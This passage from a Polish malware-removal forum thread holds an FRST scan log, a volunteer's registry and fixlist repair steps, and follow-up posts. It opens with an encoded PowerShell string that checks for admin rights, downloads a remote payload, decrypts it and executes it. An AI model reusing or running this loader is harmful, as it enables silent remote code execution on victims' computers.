AHIAVgBlAHIAcwBpAG8AbgAgAC0AbAB0ACAAMgApACkAewBiAHIAZQBhAGsAOwB9AH0ACgBpAGYAKAAtAE4ATwBUACAAKABbAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBQAHIAaQBuAGMAaQBwAGEAbABdAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAEkAZABlAG4AdABpAHQAeQBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0ACgAKQApAC4ASQBzAEkAbgBSAG8AbABlACgAWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMAQgB1AGkAbAB0AEkAbgBSAG8AbABlAF0AIAAiAEEAZABtAGkAbgBpAHMAdAByAGEAdABvAHIAIgApACkAewBiAHIAZQBhAGsAOwB9AAoAZgB1AG4AYwB0AGkAbwBuACAAdwBjACgAJAB1AHIAbAApAHsAJAByAHEAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAByAHEALgBVAHMAZQBEAGUAZgBhAHUAbAB0AEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA9ACQAdAByAHUAZQA7ACQAcgBxAC4ASABlAGEAZABlAHIAcwAuAEEAZABkACgAIgB1AHMAZQByAC0AYQBnAGUAbgB0ACIALAAiAE0AbwB6AGkAbABsAGEALwA0AC4AMAAgACgAYwBvAG0AcABhAHQAaQBiAGwAZQA7ACAATQBTAEkARQAgADcALgAwADsAIABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwApACIAKQA7AHIAZQB0AHUAcgBuACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAHIAcQAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJAB1AHIAbAApACkAOwB9AAoAZgB1AG4AYwB0AGkAbwBuACAAZABzAHQAcgAoACQAcgBhAHcAZABhAHQAYQApAHsAJABiAHQAPQBbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAcgBhAHcAZABhAHQAYQApADsAJABlAHgAdAA9ACQAYgB0AFsAMABdADsAJABrAGUAeQA9ACQAYgB0AFsAMQBdACAALQBiAHgAbwByACAAMQA3ADAAOwBmAG8AcgAoACQAaQA9ADIAOwAkAGkAIAAtAGwAdAAgACQAYgB0AC4ATABlAG4AZwB0AGgAOwAkAGkAKwArACkAewAkAGIAdABbACQAaQBdAD0AKAAkAGIAdABbACQAaQBdACAALQBiAHgAbwByACAAKAAoACQAawBlAHkAIAArACAAJABpACkAIAAtAGIAYQBuAGQAIAAyADUANQApACkAOwB9AAoAcgBlAHQAdQByAG4AKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARABlAGYAbABhAHQAZQBTAHQAcgBlAGEAbQAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgAJABiAHQALAAyACwAKAAkAGIAdAAuAEwAZQBuAGcAdABoAC0AJABlAHgAdAApACkAKQAsAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA7AH0ACgAkAHMAYwA9AGQAcwB0AHIAKAB3AGMAKAAkAHMAdQByAGwAKQApADsASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAALQBjAG8AbQBtAGEAbgBkACAAIgAkAHMAYwAiADsAfQBjAGEAdABjAGgAewB9ADsAZQB4AGkAdAAgADAAOwA=

(Załączenie wejścia w fixlist spowoduje przesunięcie pliku zadania (.job). Plik uruchamiany docelowo przez zadanie nie zostanie przeniesiony.)

Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

==================== Skróty =============================

(Wybrane wejścia mogą zostać załączone w celu ich zresetowania lub usunięcia.)

==================== Załadowane moduły (filtrowane) ==============

2015-09-23 22:41 - 2015-09-23 22:41 - 00188072 _____ () C:\Program Files (x86)\Razer\Razer Services\GSS\GameScannerService.exe
2013-08-22 08:19 - 2013-08-22 07:54 - 00174592 _____ () C:\Windows\system32\WinMetadata\Windows.UI.winmd
2015-12-30 15:42 - 2012-10-22 06:22 - 01199648 ____R () C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\ACE.dll
2015-12-05 10:21 - 2015-12-05 10:21 - 00933056 ____R () C:\Program Files (x86)\Skype\Phone\ssScreenVVS2.dll
2016-01-08 16:00 - 2016-01-08 16:00 - 40500224 _____ () C:\Program Files (x86)\AVG\UiDll\2171\libcef.dll
2015-12-31 08:37 - 2015-10-28 16:50 - 00264192 _____ () D:\Razer Cortex\D3DX8Wrapper.dll
2015-12-31 08:36 - 2015-10-28 16:50 - 00724480 _____ () D:\Razer Cortex\Cef\CefSharp.Core.dll
2015-12-31 08:36 - 2015-10-28 16:50 - 41289216 _____ () D:\Razer Cortex\Cef\libcef.dll
2015-12-31 08:36 - 2015-10-28 16:50 - 00544256 _____ () D:\Razer Cortex\Cef\CefSharp.BrowserSubprocess.Core.dll
2015-12-31 08:36 - 2015-10-28 16:50 - 01482240 _____ () D:\Razer Cortex\Cef\libglesv2.dll
2015-12-31 08:36 - 2015-10-28 16:50 - 00073728 _____ () D:\Razer Cortex\Cef\libegl.dll

==================== Alternate Data Streams (filtrowane) =========

(Załączenie wejścia w fixlist spowoduje usunięcie strumienia ADS.)


==================== Tryb awaryjny (filtrowane) ===================

(Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Wartość "AlternateShell" zostanie przywrócona.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MSIServer => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Hamachi2Svc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MSIServer => ""="Service"

==================== EXE - Powiązania (filtrowane) ===============

(Załączenie wejścia w fixlist spowoduje usunięcie obiektu z rejestru lub przywrócenie jego domyślnej postaci.)


==================== Internet Explorer - Witryny zaufane i z ograniczeniami ===============

(Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru.)


==================== Hosts - zawartość: ===============================

(Użycie dyrektywy Hosts: w fixlist spowoduje reset pliku Hosts.)

2013-08-22 14:25 - 2013-08-22 14:25 - 00000824 ____N C:\Windows\system32\Drivers\etc\hosts


==================== Inne obszary ============================

(Obecnie brak automatycznej naprawy dla tej sekcji.)

HKU\S-1-5-21-3176993754-4223996750-584129700-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\Rafał\Desktop\31011-steelseries-1920x1080-computer-wallpaper.jpg
DNS Servers: 109.196.48.2 - 8.8.4.4
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
mpsdrv => Usługa "Zapora systemu Windows" nie jest uruchomiona.
MpsSvc => Usługa "Zapora systemu Windows" nie jest uruchomiona.

==================== MSCONFIG/TASK MANAGER - Wyłączone elementy ==

(Obecnie brak automatycznej naprawy dla tej sekcji.)

MSCONFIG\Services: Disc Soft Lite Bus Service => 3
MSCONFIG\Services: ISCTAgent => 2
HKLM\...\StartupApproved\StartupFolder: => "SteelSeries Engine 3.lnk"
HKU\S-1-5-21-3176993754-4223996750-584129700-1001\...\StartupApproved\Run: => "Software Informer"
HKU\S-1-5-21-3176993754-4223996750-584129700-1001\...\StartupApproved\Run: => "ScreenShooter"
HKU\S-1-5-21-3176993754-4223996750-584129700-1001\...\StartupApproved\Run: => "EADM"
HKU\S-1-5-21-3176993754-4223996750-584129700-1001\...\StartupApproved\Run: => "CCleaner Monitoring"

==================== Reguły Zapory systemu Windows (filtrowane) ===============

(Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.)

FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139
FirewallRules: [TCP Query User{B57C08E1-C3AA-4558-9C0F-1C2924A45FD4}C:\program files (x86)\tmnationsforever\tmforever.exe] => (Allow) C:\program files (x86)\tmnationsforever\tmforever.exe
FirewallRules: [UDP Query User{8BCB6E86-2B82-45B5-A009-95BAE7B41DDF}C:\program files (x86)\tmnationsforever\tmforever.exe] => (Allow) C:\program files (x86)\tmnationsforever\tmforever.exe
FirewallRules: [{DC0A7461-717E-4333-A5A5-11276B99B3C4}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{650C9E4F-6FEF-49DC-AEE3-98FBCBBD3B4E}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{D97F1DFD-E865-4E1D-8890-54BA6B7485A0}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{B04000A9-50FE-4B56-91F4-C56C05B9543D}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe

==================== Punkty Przywracania systemu =========================

30-12-2015 15:39:06 Zainstalowany program DirectX
31-12-2015 16:36:09 Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501
02-01-2016 17:21:42 Zainstalowane League of Legends
04-01-2016 11:08:41 Installed ProductName from default.wxl
07-01-2016 09:01:09 Removed Adobe Acrobat Reader DC - Polish.
08-01-2016 15:06:19 Removed AVG
11-01-2016 18:00:16 Installed LogMeIn Hamachi
Sprawdź usługę "winmgmt" lub napraw WMI.


==================== Wadliwe urządzenia w Menedżerze urządzeń =============


==================== Błędy w Dzienniku zdarzeń: =========================

Dziennik Aplikacja:
==================
Error: (01/14/2016 02:45:54 PM) (Source: Steam Client Service) (EventID: 1) (User: )
Description: Error: Failed to add firewall exception for C:\Program Files (x86)\Steam\bin\steamwebhelper.exe

Error: (01/14/2016 02:45:54 PM) (Source: Steam Client Service) (EventID: 1) (User: )
Description: Error: Failed to add firewall exception for C:\Program Files (x86)\Steam\steam.exe

Error: (01/13/2016 06:47:39 PM) (Source: Steam Client Service) (EventID: 1) (User: )
Description: Error: Failed to add firewall exception for C:\Program Files (x86)\Steam\bin\steamwebhelper.exe

Error: (01/13/2016 06:47:39 PM) (Source: Steam Client Service) (EventID: 1) (User: )
Description: Error: Failed to add firewall exception for C:\Program Files (x86)\Steam\steam.exe

Error: (01/13/2016 05:08:24 PM) (Source: Steam Client Service) (EventID: 1) (User: )
Description: Error: Failed to add firewall exception for C:\Program Files (x86)\Steam\bin\steamwebhelper.exe

Error: (01/13/2016 05:08:24 PM) (Source: Steam Client Service) (EventID: 1) (User: )
Description: Error: Failed to add firewall exception for C:\Program Files (x86)\Steam\steam.exe

Error: (01/13/2016 08:07:11 AM) (Source: Steam Client Service) (EventID: 1) (User: )
Description: Error: Failed to add firewall exception for C:\Program Files (x86)\Steam\bin\steamwebhelper.exe

Error: (01/13/2016 08:07:11 AM) (Source: Steam Client Service) (EventID: 1) (User: )
Description: Error: Failed to add firewall exception for C:\Program Files (x86)\Steam\steam.exe

Error: (01/13/2016 07:28:02 AM) (Source: Steam Client Service) (EventID: 1) (User: )
Description: Error: Failed to add firewall exception for C:\Program Files (x86)\Steam\bin\steamwebhelper.exe

Error: (01/13/2016 07:28:02 AM) (Source: Steam Client Service) (EventID: 1) (User: )
Description: Error: Failed to add firewall exception for C:\Program Files (x86)\Steam\steam.exe


Dziennik System:
=============
Error: (01/14/2016 05:38:46 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: Usługa Grupowanie sieci równorzędnej zależy od usługi Protokół rozpoznawania nazw równorzędnych, której nie można uruchomić z powodu następującego błędu:
%%1062

Error: (01/14/2016 05:38:44 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: Usługa Grupowanie sieci równorzędnej zależy od usługi Protokół rozpoznawania nazw równorzędnych, której nie można uruchomić z powodu następującego błędu:
%%1062

Error: (01/14/2016 05:38:42 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: Usługa Grupowanie sieci równorzędnej zależy od usługi Protokół rozpoznawania nazw równorzędnych, której nie można uruchomić z powodu następującego błędu:
%%1062

Error: (01/14/2016 05:24:44 PM) (Source: Service Control Manager) (EventID: 7011) (User: )
Description: Upłynął limit czasu (30000 ms) podczas oczekiwania na odpowiedź transakcji z usługi avgsvc.

Error: (01/14/2016 05:24:14 PM) (Source: Service Control Manager) (EventID: 7011) (User: )
Description: Upłynął limit czasu (30000 ms) podczas oczekiwania na odpowiedź transakcji z usługi avgsvc.

Error: (01/14/2016 02:45:02 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: Usługa Grupowanie sieci równorzędnej zależy od usługi Protokół rozpoznawania nazw równorzędnych, której nie można uruchomić z powodu następującego błędu:
%%1062

Error: (01/14/2016 02:45:00 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: Usługa Grupowanie sieci równorzędnej zależy od usługi Protokół rozpoznawania nazw równorzędnych, której nie można uruchomić z powodu następującego błędu:
%%1062

Error: (01/14/2016 02:44:54 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: Usługa Grupowanie sieci równorzędnej zależy od usługi Protokół rozpoznawania nazw równorzędnych, której nie można uruchomić z powodu następującego błędu:
%%1062

Error: (01/14/2016 02:44:52 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: Usługa Grupowanie sieci równorzędnej zależy od usługi Protokół rozpoznawania nazw równorzędnych, której nie można uruchomić z powodu następującego błędu:
%%1062

Error: (01/13/2016 09:19:34 PM) (Source: Service Control Manager) (EventID: 7011) (User: )
Description: Upłynął limit czasu (30000 ms) podczas oczekiwania na odpowiedź transakcji z usługi avgsvc.


CodeIntegrity:
===================================
  Date: 2016-01-13 08:06:14.964
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files (x86)\AVG\Av\avgidsagent.exe) attempted to load \Device\HarddiskVolume2\Program Files (x86)\AVG\Framework\Common\avgfmwbasex.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2016-01-13 07:27:30.818
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files (x86)\AVG\Av\avgidsagent.exe) attempted to load \Device\HarddiskVolume2\Program Files (x86)\AVG\Framework\Common\avgfmwbasex.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2016-01-13 07:27:25.474
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files (x86)\AVG\Av\avgidsagent.exe) attempted to load \Device\HarddiskVolume2\Program Files (x86)\AVG\Framework\Common\avgfmwbasex.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2016-01-13 07:26:57.363
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files (x86)\AVG\Av\avgidsagent.exe) attempted to load \Device\HarddiskVolume2\Program Files (x86)\AVG\Framework\Common\avgfmwbasex.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2016-01-13 07:26:57.332
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files (x86)\AVG\Av\avgidsagent.exe) attempted to load \Device\HarddiskVolume2\Program Files (x86)\AVG\Framework\Common\avgfmwbasex.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2016-01-13 07:26:57.317
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files (x86)\AVG\Av\avgidsagent.exe) attempted to load \Device\HarddiskVolume2\Program Files (x86)\AVG\Framework\Common\avgfmwbasex.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2016-01-13 07:26:57.285
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files (x86)\AVG\Av\avgidsagent.exe) attempted to load \Device\HarddiskVolume2\Program Files (x86)\AVG\Framework\Common\avgfmwbasex.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2016-01-13 07:26:57.254
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files (x86)\AVG\Av\avgidsagent.exe) attempted to load \Device\HarddiskVolume2\Program Files (x86)\AVG\Framework\Common\avgfmwbasex.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2016-01-12 18:55:34.150
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files (x86)\AVG\Av\avgidsagent.exe) attempted to load \Device\HarddiskVolume2\Program Files (x86)\AVG\Framework\Common\avgfmwbasex.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2016-01-12 15:47:35.123
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files (x86)\AVG\Av\avgidsagent.exe) attempted to load \Device\HarddiskVolume2\Program Files (x86)\AVG\Framework\Common\avgfmwbasex.dll that did not meet the Custom 3 / Antimalware signing level requirements.


==================== Statystyki pamięci ===========================

Procesor: Intel(R) Core(TM) i5-3470 CPU @ 3.20GHz
Procent pamięci w użyciu: 27%
Całkowita pamięć fizyczna: 8122.92 MB
Dostępna pamięć fizyczna: 5910.72 MB
Całkowita pamięć wirtualna: 8954.92 MB
Dostępna pamięć wirtualna: 5988.95 MB

==================== Dyski ================================

Drive c: (SYSTEM) (Fixed) (Total:244.04 GB) (Free:147.03 GB) NTFS
Drive d: () (Fixed) (Total:341.8 GB) (Free:305.54 GB) NTFS
Drive e: () (Fixed) (Total:345.57 GB) (Free:343.63 GB) NTFS
Drive h: (FlatOut 2) (CDROM) (Total:2.74 GB) (Free:0 GB) CDFS
Drive i: (CRYSIS 2) (CDROM) (Total:7.64 GB) (Free:0 GB) CDFS
Drive j: (Blades of Time) (CDROM) (Total:3.1 GB) (Free:0 GB) CDFS
Drive k: (Viking) (CDROM) (Total:4 GB) (Free:0 GB) CDFS

==================== MBR & Tablica partycji ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 931.5 GB) (Disk ID: 2225CE9F)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=244 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=341.8 GB) - (Type=07 NTFS)
Partition 4: (Not Active) - (Size=345.6 GB) - (Type=07 NTFS)
 

Twój_Anioł_Stróż
komentarz
komentarz

Brak logu FRST.txt.

 

1)

Sprawdź usługę "winmgmt" lub napraw WMI.

 

Do Notatnika wklej:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Winmgmt]
"DisplayName"="@%Systemroot%\\system32\\wbem\\wmisvc.dll,-205"
"ImagePath"=hex(2):25,00,73,00,79,00,73,00,74,00,65,00,6d,00,72,00,6f,00,6f,00,\
74,00,25,00,5c,00,73,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,73,\
00,76,00,63,00,68,00,6f,00,73,00,74,00,2e,00,65,00,78,00,65,00,20,00,2d,00,\
6b,00,20,00,6e,00,65,00,74,00,73,00,76,00,63,00,73,00,00,00
"Description"="@%Systemroot%\\system32\\wbem\\wmisvc.dll,-204"
"ObjectName"="localSystem"
"ErrorControl"=dword:00000000
"Start"=dword:00000002
"Type"=dword:00000020
"DependOnService"=hex(7):52,00,50,00,43,00,53,00,53,00,00,00,00,00
"ServiceSidType"=dword:00000001
"FailureActions"=hex:80,51,01,00,00,00,00,00,00,00,00,00,03,00,00,00,14,00,00,\
00,01,00,00,00,c0,d4,01,00,01,00,00,00,e0,93,04,00,00,00,00,00,00,00,00,00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Winmgmt\Parameters]
"ServiceDllUnloadOnStop"=dword:00000001
"ServiceDll"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,\
00,74,00,25,00,5c,00,73,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,\
77,00,62,00,65,00,6d,00,5c,00,57,00,4d,00,49,00,73,00,76,00,63,00,2e,00,64,\
00,6c,00,6c,00,00,00
"ServiceMain"="ServiceMain"
Z Menu Notatnika >> [b]Plik[/b] >> [b]Zapisz jako[/b] >> Ustaw rozszerzenie na [b]Wszystkie pliki[/b] >> [b]Zapisz jako[/b]> [b][color=red]FIX.REG [/color][/b]>>
Kliknij prawym na plik i z menu wybierz opcję Scal. Potwierdź import do rejestru.

 

2) Otwórz Notatnik i wklej w nim:

Task: {AAA89DAF-1B4F-447D-AF21-7F0559AC9962} - \Microsoft\Windows\Windows Media Sharing\UpdateLibrary -> Brak pliku <==== UWAGA
Task: {3D130900-BA53-43C7-BDD8-8F2306411FAD} - \AutoPico Daily Restart -> Brak pliku <==== UWAGA
EmptyTemp:

Plik zapisz pod nazwą [b]fixlist.txt[/b] i umieść obok FRST.exe
Uruchom [b]FRST[/b] i kliknij przycisk [b]Fix[/b] (NAPRAW).

 

3) Zrób nowe logi FRST.

 

Log wklej na [url=http://wklejto.pl/][b][color=blue]http://wklejto.pl/[/color][/b][/url], a w poście daj tylko link.(czyli skopiuj adres z paska adresów)

.
 

aQuaK1337
komentarz
komentarz

Mam ten fixlist w tym samym folderze co FRST a i tak nie wykrywa mi go ;/

Twój_Anioł_Stróż
komentarz
komentarz

C:\Users\Rafał\Downloads

na pewno masz fixlist w tym folderze?

aQuaK1337
komentarz
komentarz

Ok działa, zaraz zrobię nowe logi i wkleję.


FRST: http://wklej.to/nejWg

ADDITION: http://wklej.to/zrmRW


Aniele... doradź jak usunąć te cholerne reklamy ;/

http://screenshot.sh/mFcgkDtZhndnz


Adblocka mam ale jak widać, źle działa

Twój_Anioł_Stróż
komentarz
komentarz

W nowych logach - nic podejrzanego.

 

Nie znam sposobu na takie reklamy - są chyba przyklejone do stron.

.

aQuaK1337
komentarz
komentarz

Dobra, nie ważne. Dziękuję za pomoc z wirusami.

Wciąż szukasz rozwiązania problemu? Napisz teraz na forum!

Możesz zadać pytanie bez konieczności rejestracji - wystarczy, że wypełnisz formularz.

×
×
  • Dodaj nową pozycję...

Powiadomienie o plikach cookie

Strona wykorzystuje pliki cookies w celu prawidłowego świadczenia usług i wygody użytkowników. Warunki przechowywania i dostępu do plików cookies możesz zmienić w ustawieniach przeglądarki.